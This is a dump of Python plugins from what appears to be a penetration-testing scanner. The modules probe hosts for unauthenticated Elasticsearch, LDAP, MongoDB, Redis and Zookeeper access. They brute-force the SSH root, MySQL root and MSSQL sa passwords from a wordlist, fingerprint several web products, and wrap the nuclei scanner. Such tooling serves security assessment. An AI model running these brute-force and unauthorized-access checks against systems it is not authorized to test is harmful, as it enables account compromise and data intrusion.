--------------------------------------------------------------------------------
/Plugins/Vul/CMS/qizhi.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 模板
15 | class Detect(threading.Thread):
16 | name = '齐治堡垒机'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | return False
29 |
30 |
31 | if __name__ == '__main__':
32 | from queue import Queue
33 |
34 | vul_list = []
35 | # proxy = r'192.168.168.148:10086'
36 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
37 | requests_proxies = None
38 | url = r'http://www.domain.com'
39 | Detect(url, vul_list, requests_proxies).run_detect()
40 |
41 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
42 | for vul in vul_list:
43 | tqdm.write(Fore.BLACK + str(vul))
44 |
45 |
--------------------------------------------------------------------------------
/Plugins/Vul/Nuclei/NucleiApi.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import os
3 | import configparser
4 | import json
5 |
6 | cf = configparser.ConfigParser()
7 | cf.read("./iniFile/config.ini")
8 | secs = cf.sections()
9 | nuclei_config = cf.get('nuclei config', 'nuclei_config')
10 |
11 | def getCurrent_time():
12 | current_time = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')).replace(' ', '-').replace(':', '-')
13 | return current_time
14 |
15 | def run_nuclei(alive_Web):
16 | nucleiVul_list = []
17 |
18 | nucleiFolder = "./Plugins/Vul/Nuclei"
19 |
20 | # 保存nuclei结果的文件夹
21 | nucleiResult_folder = "{}/nucleiResult/{}".format(nucleiFolder, getCurrent_time())
22 | os.makedirs(nucleiResult_folder)
23 |
24 | # 将alive_Web的url内容保存到文件里
25 | urlFilePath = nucleiResult_folder + "/url.txt"
26 | with open(urlFilePath, 'at', encoding='utf-8') as f:
27 | for url in alive_Web:
28 | f.writelines("{}\n".format(url))
29 |
30 | # 保存nuclei结果的文件路径
31 | nucleiResultPath = nucleiResult_folder + "/nucleiResult.txt"
32 |
33 | # 赋予执行权限
34 | os.system('chmod 777 {}/nuclei'.format(nucleiFolder))
35 |
36 | # 更新nuclei模板
37 | nucleiUpdateCMD = '{}/nuclei -ud {}/nuclei-templates/'.format(nucleiFolder, nucleiFolder)
38 | print("[更新nuclei-template] : {}".format(nucleiUpdateCMD))
39 | os.system(nucleiUpdateCMD)
40 |
41 | # 运行nuclei检测漏洞
42 | nucleiCMD = '{}/nuclei -l {} {} -json -o {}'.format(nucleiFolder, urlFilePath, nuclei_config, nucleiResultPath)
43 | print("[nucleiCMD] : {}".format(nucleiCMD))
44 | os.system(nucleiCMD)
45 |
46 | # nucleiResultPath = "Plugins/Vul/Nuclei/nucleiResult/2022-04-16-18-34-09/nucleiResult.txt"
47 | # 读取nuclei结果
48 | with open(nucleiResultPath, 'rt', encoding='utf-8') as f:
49 | for eachLine in f.readlines():
50 | eachLine = eachLine.strip()
51 | nucleiResult = json.loads(eachLine)
52 | url, vulName, templateId, severity, currentTime = nucleiResult["host"], nucleiResult["info"]["name"], \
53 | nucleiResult["template-id"], nucleiResult["info"][
54 | "severity"], nucleiResult["timestamp"]
55 | print(url, vulName, templateId, severity, currentTime)
56 | nucleiVul_list.append([vulName, url, templateId])
57 |
58 | return nucleiVul_list
59 |
60 |
61 | if __name__ == '__main__':
62 | alive_Web = ['']
63 | run_nuclei(alive_Web)
--------------------------------------------------------------------------------
/Plugins/Vul/Nuclei/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Nuclei/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Nuclei/nuclei:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Nuclei/nuclei
--------------------------------------------------------------------------------
/Plugins/Vul/ObserverWard/ObserverWardApi.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import os
3 | import json
4 |
5 | def getCurrent_time():
6 | current_time = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')).replace(' ', '-').replace(':', '-')
7 | return current_time
8 |
9 | def run_observerWard(alive_Web):
10 | observerWardVul_list = []
11 |
12 | observerWardFolder = "./Plugins/Vul/ObserverWard"
13 |
14 | # 保存observerWard结果的文件夹
15 | observerWardResult_folder = "{}/observerWardResult/{}".format(observerWardFolder, getCurrent_time())
16 | os.makedirs(observerWardResult_folder)
17 |
18 | # 将alive_Web的url内容保存到文件里
19 | urlFilePath = observerWardResult_folder + "/url.txt"
20 | with open(urlFilePath, 'at', encoding='utf-8') as f:
21 | for url in alive_Web:
22 | f.writelines("{}\n".format(url))
23 |
24 | # 保存observerWard结果的文件路径
25 | observerWardResultPath = observerWardResult_folder + "/observerWardResult.json"
26 |
27 | # 赋予执行权限
28 | os.system('chmod 777 {}/observer_ward'.format(observerWardFolder))
29 |
30 | # 更新observerWard的指纹库
31 | observerWardUpdateCMD = '{}/observer_ward --update_fingerprint'.format(observerWardFolder)
32 | print("[更新observerWard指纹库] : {}".format(observerWardUpdateCMD))
33 | os.system(observerWardUpdateCMD)
34 |
35 | # 运行observerWard检测漏洞
36 | observerWardCMD = '{}/observer_ward -f {} -j {}'.format(observerWardFolder, urlFilePath, observerWardResultPath)
37 | print("[observerWardCMD] : {}".format(observerWardCMD))
38 | os.system(observerWardCMD)
39 |
40 | # observerWardResultPath = "../../../test/1.json"
41 | # 读取observerWard结果
42 | with open(observerWardResultPath, 'rt', encoding='utf-8') as f:
43 | text = f.read()
44 | if text:
45 | for each in json.loads(text):
46 | url, vulName = each["url"], each["name"]
47 | if vulName:
48 | # print(url, vulName)
49 | observerWardVul_list.append([str(vulName), url, 'Yes'])
50 |
51 | return observerWardVul_list
52 |
53 | if __name__ == '__main__':
54 | alive_Web = ['']
55 | run_observerWard(alive_Web)
--------------------------------------------------------------------------------
/Plugins/Vul/ObserverWard/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/ObserverWard/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/ObserverWard/observer_ward:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/ObserverWard/observer_ward
--------------------------------------------------------------------------------
/Plugins/Vul/Param/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Param/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Service/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Service/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthElastic.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from elasticsearch import Elasticsearch
3 | from termcolor import cprint
4 | import re
5 |
6 | # ElasticSearch未授权漏洞检测
7 | class Detect():
8 | name = 'elastic'
9 |
10 | def __init__(self, ip, port, vul_list):
11 | self.ip = ip
12 | self.port = port
13 | self.vul_list = vul_list # 存储漏洞的名字和url
14 |
15 | # 只需要修改下面的代码就行
16 | def run_detect(self, weakPwdsList):
17 | # print('test elastic : {} {}'.format(self.ip, self.port))
18 | try:
19 | es = Elasticsearch("{}:{}".format(self.ip, self.port), timeout=20) # 连接Elasticsearch,延时5秒
20 | es.indices.create(index='unauth_text')
21 | print('[+] connect to :{}'.format(self.ip))
22 | print('[+] {} -> Successful creation of a unauth_text node'.format(self.ip))
23 | es.index(index="unauth_text", doc_type="test-type", id=2, body={"text": "text"})
24 | print('[+] {} -> Successfully insert data into node unauth_text'.format(self.ip))
25 | ret = es.get(index="unauth_text", doc_type="test-type", id=2)
26 | print('[+] {} -> Successful acquisition of node unauth_text data : {}'.format(self.ip, ret))
27 | es.indices.delete(index='unauth_text')
28 | print('[+] {} -> Clear test node unauth_text data'.format(self.ip))
29 |
30 |
31 | host = '{}:{}'.format(self.ip, self.port)
32 | try:
33 | print('[+] {} -> Trying to get node information:↓'.format(self.ip))
34 | text = es.cat.indices()
35 | nodes = re.findall(r'open ([^ ]*) ', text)
36 | cprint('[ok] -> [{}] {}:{} -> : {}'.format(self.name, self.ip, self.port, nodes), 'red')
37 | host = '{} {}'.format(host, nodes)
38 | except Exception:
39 | cprint('[ok] -> [{}] {}:{}'.format(self.name, self.ip, self.port), 'red')
40 |
41 | self.vul_list.append([self.name, host, 'Yes'])
42 |
43 | except Exception as e:
44 | print(e.args)
45 |
46 |
47 | if __name__ == '__main__':
48 | ip = r'ip'
49 | port = 0000
50 | vul_list = []
51 | Detect(ip, port, vul_list).run_detect([])
52 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthLdaps.py:
--------------------------------------------------------------------------------
1 | import ldap3
2 | from termcolor import cprint
3 |
4 | # Ldaps未授权漏洞检测
5 | class Detect():
6 | name = 'ldaps'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # 存储漏洞的名字和url
12 |
13 | # 只需要修改下面的代码就行
14 | def run_detect(self, weakPwdsList):
15 | # print('test ldaps : {}:389'.format(self.ip))
16 | try:
17 | server = ldap3.Server(host=self.ip, port=389, allowed_referral_hosts=[('*', False)], get_info=ldap3.ALL,
18 | connect_timeout=30) # port就默认使用389,因为ldap查出来的端口是636,但是实际利用得用389端口
19 | conn = ldap3.Connection(server, auto_bind=True)
20 | if len(server.info.naming_contexts) > 0:
21 | for _ in server.info.naming_contexts:
22 | if conn.search(_, '(objectClass=inetOrgPerson)'):
23 | naming_contexts = _.encode('utf8')
24 | # print naming_contexts
25 | cprint('[ok] -> [{}] {} : {}'.format(self.name, self.ip, naming_contexts), 'red')
26 | self.vul_list.append([self.name, '{}:389 {}'.format(self.ip, naming_contexts), 'Yes'])
27 | break
28 | except Exception as e:
29 | pass
30 |
31 | if __name__ == '__main__':
32 | ip = r'ip'
33 | port = 0000
34 | vul_list = []
35 | Detect(ip, port, vul_list).run_detect([])
36 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthMongodb.py:
--------------------------------------------------------------------------------
1 | from pymongo import MongoClient
2 | from termcolor import cprint
3 |
4 | # mongodb未授权漏洞检测
5 | class Detect():
6 | name = 'mongodb'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # 存储漏洞的名字和url
12 |
13 | # 只需要修改下面的代码就行
14 | def run_detect(self, weakPwdsList):
15 | # print('test mongodb : {} {}'.format(self.ip, self.port))
16 | try:
17 | conn = MongoClient(self.ip, self.port, socketTimeoutMS=5000) # 连接MongoDB,延时5秒
18 | dbs = conn.database_names()
19 | conn.close()
20 | cprint('[ok] -> [{}] {}:{} database_names:{}'.format(self.name, self.ip, self.port, dbs), 'red')
21 | self.vul_list.append([self.name, '{}:{} {}'.format(self.ip, self.port, dbs), 'Yes'])
22 | except Exception as e:
23 | # print(e.args)
24 | pass
25 |
26 | if __name__ == '__main__':
27 | ip = r'ip'
28 | port = 0000
29 | vul_list = []
30 | Detect(ip, port, vul_list).run_detect([])
31 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthRedis.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import redis
3 | from termcolor import cprint
4 |
5 | # redis未授权漏洞检测
6 | class Detect():
7 | name = 'redis'
8 |
9 | def __init__(self, ip, port, vul_list):
10 | self.ip = ip
11 | self.port = port
12 | self.vul_list = vul_list # 存储漏洞的名字和url
13 |
14 | # 只需要修改下面的代码就行
15 | def run_detect(self, weakPwdsList):
16 | # print('test redis : {} {}'.format(self.ip, self.port))
17 | try:
18 | r = redis.Redis(host=self.ip, port=self.port, socket_timeout=20)
19 | r.set('name', 'test')
20 | if r.get('name'):
21 | cprint('[ok] -> [{}] {}:{}'.format(self.name, self.ip, self.port), 'red')
22 | self.vul_list.append([self.name, '{}:{}'.format(self.ip, self.port), 'Yes'])
23 | else:
24 | print('[error] -> {}:{}'.format(self.ip, self.port))
25 | except Exception as e:
26 | print(e.args)
27 |
28 | if __name__ == '__main__':
29 | ip = r'ip'
30 | port = 0000
31 | vul_list = []
32 | Detect(ip, port, vul_list).run_detect([])
33 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthZookeeper.py:
--------------------------------------------------------------------------------
1 | from kazoo.client import KazooClient
2 | from termcolor import cprint
3 |
4 | # Zookeeper未授权漏洞检测
5 | class Detect():
6 | name = 'zookeeper'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # 存储漏洞的名字和url
12 |
13 | # 只需要修改下面的代码就行
14 | def run_detect(self, weakPwdsList):
15 | # print('test zookeeper : {}:{}'.format(self.ip, self.port))
16 | try:
17 | zk = KazooClient(hosts='{}:{}'.format(self.ip, self.port))
18 | zk.start()
19 | chidlrens = zk.get_children('/')
20 | if len(chidlrens) > 0:
21 | cprint('[ok] -> [{}] {}:{} {}'.format(self.name, self.ip, self.port, chidlrens), 'red')
22 | self.vul_list.append([self.name, '{}:{} {}'.format(self.ip, self.port, chidlrens), 'Yes'])
23 | zk.stop()
24 | except Exception as e:
25 | pass
26 |
27 | if __name__ == '__main__':
28 | ip = r'ip'
29 | port = 0000
30 | vul_list = []
31 | Detect(ip, port, vul_list).run_detect([])
32 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakMSSQL.py:
--------------------------------------------------------------------------------
1 | import pymssql
2 | from termcolor import cprint
3 |
4 | # mssql弱口令爆破
5 | class Detect():
6 | name = 'mssql'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # 存储漏洞的名字和url
12 |
13 | # 只需要修改下面的代码就行
14 | def run_detect(self, weakPwdsList):
15 | user = 'sa'
16 | database = 'master'
17 |
18 | for password in weakPwdsList:
19 | password = password.strip()
20 | try:
21 | # 一定要加tds_version='7.0',否则会报错
22 | conn = pymssql.connect(host=self.ip, user=user, password=password, database=database, charset='utf8', tds_version='7.0')
23 | conn.close()
24 | cprint('[+] [{}] [{}] [sa:{}] successful!'.format(self.name, self.ip, password), 'red')
25 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(user, password)])
26 | break
27 | except pymssql.OperationalError as e:
28 | if '18456' in str(e.args):
29 | print('[-] [{}] [sa:{}] mssql password error'.format(self.ip, password))
30 | elif '20009' in str(e.args):
31 | cprint('[Fail] [{}] not open mssql service'.format(self.ip), 'cyan')
32 | break
33 | except Exception as e:
34 | pass
35 |
36 | '''
37 | # 账号密码错误
38 | pymssql.OperationalError: (18456, b"\xe7\x94\xa8\xe6\x88\xb7 'sa' \xe7\x99\xbb\xe5\xbd\x95\xe5\xa4\xb1\xe8\xb4\xa5\xe3\x80\x82DB-Lib error message 18456, severity 14:\nGeneral SQL Server error: Check messages from the SQL Server\nDB-Lib error message 20002, severity 9:\nAdaptive Server connection failed\n")
39 | # mssql服务没开
40 | pymssql.OperationalError: (20009, b'DB-Lib error message 20009, severity 9:\nUnable to connect: Adaptive Server is unavailable or does not exist\nNet-Lib error during Connection refused (61)\n')
41 | '''
42 |
43 |
44 | if __name__ == '__main__':
45 | ip = r'ip'
46 | port = 0000
47 | vul_list = []
48 | Detect(ip, port, vul_list).run_detect([])
49 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakMYSQL.py:
--------------------------------------------------------------------------------
1 | import pymysql
2 | from termcolor import cprint
3 |
4 |
5 | # mysql弱口令爆破
6 | class Detect():
7 | name = 'mysql'
8 |
9 | def __init__(self, ip, port, vul_list):
10 | self.ip = ip
11 | self.port = port
12 | self.vul_list = vul_list # 存储漏洞的名字和url
13 |
14 | # 只需要修改下面的代码就行
15 | def run_detect(self, weakPwdsList):
16 | user = 'root'
17 | for password in weakPwdsList:
18 | password = password.strip()
19 | try:
20 | # 连接数据库
21 | connect = pymysql.Connect(host=self.ip, port=self.port, user=user, passwd=password, charset='utf8')
22 | connect.close()
23 | cprint('[+] [{}] [{}] [root:{}] successful!'.format(self.name, self.ip, password), 'red')
24 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(user, password)])
25 | break
26 | except pymysql.OperationalError as e:
27 | if 'Access denied for user ' in str(e.args):
28 | print('[-] [{}] [root:{}] mysql password error'.format(self.ip, password))
29 | elif "Can't connect to MySQL server" in str(e.args):
30 | cprint('[Fail] [{}] not open mssql service'.format(self.ip), 'cyan')
31 | break
32 | except Exception as e:
33 | pass
34 |
35 | '''
36 | # 账号密码错误
37 | pymysql.err.OperationalError: (1045, "Access denied for user 'root'@'172.18.82.177' (using password: YES)")
38 |
39 | # 没开mysql服务
40 | pymysql.err.OperationalError: (2003, "Can't connect to MySQL server on '172.18.89.21' ([Errno 61] Connection refused)")
41 | '''
42 |
43 | if __name__ == '__main__':
44 | ip = r'ip'
45 | port = 0000
46 | vul_list = []
47 | Detect(ip, port, vul_list).run_detect([])
48 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakSSH.py:
--------------------------------------------------------------------------------
1 | import paramiko
2 | from termcolor import cprint
3 |
4 | # ssh弱口令爆破
5 | class Detect():
6 | name = 'ssh'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # 存储漏洞的名字和url
12 |
13 | # 只需要修改下面的代码就行
14 | def run_detect(self, weakPwdsList):
15 | username = 'root'
16 |
17 | # 创建一个ssh的客户端,用来连接服务器
18 | ssh = paramiko.SSHClient()
19 | # 创建一个ssh的白名单
20 | know_host = paramiko.AutoAddPolicy()
21 | # 加载创建的白名单
22 | ssh.set_missing_host_key_policy(know_host)
23 |
24 | for password in weakPwdsList:
25 | password = password.strip()
26 | try:
27 | # 连接服务器
28 | ssh.connect(
29 | hostname=self.ip,
30 | port=self.port,
31 | username=username,
32 | password=password
33 | )
34 | cprint('[+] [{}] [{}] [root:{}] successful!'.format(self.name, self.ip, password), 'red')
35 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(username, password)])
36 | ssh.close()
37 | break
38 | except paramiko.ssh_exception.AuthenticationException as e:
39 | print('[-] [{}] [root:{}] ssh password error'.format(self.ip, password))
40 | except paramiko.ssh_exception.NoValidConnectionsError as e:
41 | cprint('[Fail] [{}] not open ssh service'.format(self.ip), 'cyan')
42 | break
43 | except paramiko.ssh_exception.SSHException as e:
44 | pass
45 | except Exception as e:
46 | pass
47 |
48 | if __name__ == '__main__':
49 | ip = r'ip'
50 | port = 0000
51 | vul_list = []
52 | Detect(ip, port, vul_list).run_detect([])
53 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Web/FineReport.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 | import urllib3
9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 |
11 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
12 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
13 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
14 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
15 |
16 |
17 |
18 | # 模板
19 | class Detect(threading.Thread):
20 | name = 'FineReport'
21 |
22 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
23 | threading.Thread.__init__(self)
24 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
25 | self.pbar = pbar # 进度条
26 | self.vul_list = vul_list # 存储漏洞的名字和url
27 | self.proxies = requests_proxies # 代理
28 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
29 |
30 | def run(self):
31 | while not self.alive_Web_queue.empty():
32 | alive_web = self.alive_Web_queue.get()
33 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
34 | self.run_detect(alive_web.rstrip('/'))
35 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
36 | self.alive_Web_queue.task_done()
37 |
38 | # 调用各种漏洞检测方法
39 | def run_detect(self, url):
40 | self.check(url)
41 |
42 | def check(self, url):
43 | FineReport_url = url + '/WebReport/ReportServer'
44 | try:
45 | res = requests.get(url=FineReport_url, headers=self.headers, proxies=self.proxies, verify=False, timeout=10)
46 | text = res.text
47 | if 'FineReport--Web Reporting Tool' in text:
48 | tqdm.write(Fore.RED + '[{}] {}'.format('FineReport', url))
49 | self.vul_list.append(['FineReport', url, 'YES'])
50 | return True
51 | else:
52 | return False
53 | except Exception as e:
54 | return False
55 |
56 |
57 | if __name__ == '__main__':
58 | from queue import Queue
59 |
60 | alive_web = ['']
61 | vul_list = []
62 | # proxy = r''
63 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
64 | requests_proxies = None
65 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
66 | for _ in alive_web:
67 | alive_Web_queue.put(_)
68 |
69 | threads = []
70 | thread_num = 1 # 漏洞检测的线程数目
71 |
72 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
73 |
74 | for num in range(1, thread_num + 1):
75 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
76 | threads.append(t)
77 | t.start()
78 | for t in threads:
79 | t.join()
80 |
81 | pbar.close() # 关闭进度条
82 |
83 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
84 | for vul in vul_list:
85 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/IBM.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 |
9 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
10 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
11 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
12 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
13 |
14 |
15 |
16 | # 模板
17 | class Detect(threading.Thread):
18 | name = 'IBM'
19 |
20 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
21 | threading.Thread.__init__(self)
22 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
23 | self.pbar = pbar # 进度条
24 | self.vul_list = vul_list # 存储漏洞的名字和url
25 | self.proxies = requests_proxies # 代理
26 | self.headers = {
27 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
28 |
29 | def run(self):
30 | while not self.alive_Web_queue.empty():
31 | alive_web = self.alive_Web_queue.get()
32 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
33 | self.run_detect(alive_web.rstrip('/'))
34 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
35 | self.alive_Web_queue.task_done()
36 |
37 |
38 | # 调用各种漏洞检测方法
39 | def run_detect(self, url):
40 | # 检测是否是IBM
41 | if self.check(url):
42 | pass
43 |
44 |
45 | def check(self, url):
46 | ico_url = url + '/images/ihs/favicon.ico'
47 | m1 = hashlib.md5()
48 | try:
49 | m1.update(requests.get(url=ico_url, headers=self.headers, proxies=self.proxies, timeout=20, verify=False,
50 | allow_redirects=False).content)
51 | the_md5 = m1.hexdigest()
52 | # print(the_md5)
53 | if the_md5 == 'd8ba35521dfc638f134cf3a64d1a6875':
54 | tqdm.write(Fore.RED + '[{}] {}'.format('IBM', url))
55 | self.vul_list.append(['IBM', url, 'Maybe'])
56 | return True
57 | else:
58 | return False
59 | except Exception as e:
60 | return False
61 |
62 |
63 |
64 | if __name__ == '__main__':
65 | from queue import Queue
66 |
67 | alive_web = ['']
68 | vul_list = []
69 | # proxy = r''
70 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
71 | requests_proxies = None
72 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
73 | for _ in alive_web:
74 | alive_Web_queue.put(_)
75 |
76 | threads = []
77 | thread_num = 1 # 漏洞检测的线程数目
78 |
79 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
80 |
81 | for num in range(1, thread_num + 1):
82 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
83 | threads.append(t)
84 | t.start()
85 | for t in threads:
86 | t.join()
87 |
88 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
89 | for vul in vul_list:
90 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/__Realor.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 | from termcolor import cprint
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
8 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
9 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
10 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
11 |
12 |
13 | # 弱口令可以登陆服务器
14 | class Detect(threading.Thread):
15 | name = 'Realor'
16 |
17 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
18 | threading.Thread.__init__(self)
19 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
20 | self.pbar = pbar # 进度条
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {
24 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
25 |
26 | def run(self):
27 | while not self.alive_Web_queue.empty():
28 | alive_web = self.alive_Web_queue.get()
29 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
30 | self.run_detect(alive_web.rstrip('/'))
31 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
32 | self.alive_Web_queue.task_done()
33 |
34 | # 只需要修改下面的代码就行
35 | def run_detect(self, url):
36 | try:
37 | res = requests.get(url=url, headers=self.headers, proxies=self.proxies, timeout=10)
38 | if 'realor' in res.text:
39 | tqdm.write(Fore.RED + '[Realor] {}'.format(url))
40 | self.vul_list.append(['Realor', url, 'Maybe'])
41 | else:
42 | pass
43 | # print('[phpstudy -] {}'.format(url))
44 | except Exception as e:
45 | pass
46 | # print('[phpstudy error] {}: {}'.format(url, e.args))
47 |
48 |
49 | if __name__ == '__main__':
50 | from queue import Queue
51 |
52 | alive_web = ['']
53 | vul_list = []
54 | # proxy = r''
55 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
56 | requests_proxies = None
57 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
58 | for _ in alive_web:
59 | alive_Web_queue.put(_)
60 |
61 | threads = []
62 | thread_num = 1 # 漏洞检测的线程数目
63 |
64 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
65 |
66 | for num in range(1, thread_num + 1):
67 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
68 | threads.append(t)
69 | t.start()
70 | for t in threads:
71 | t.join()
72 |
73 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
74 | for vul in vul_list:
75 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Web/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Web/cmspro.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 |
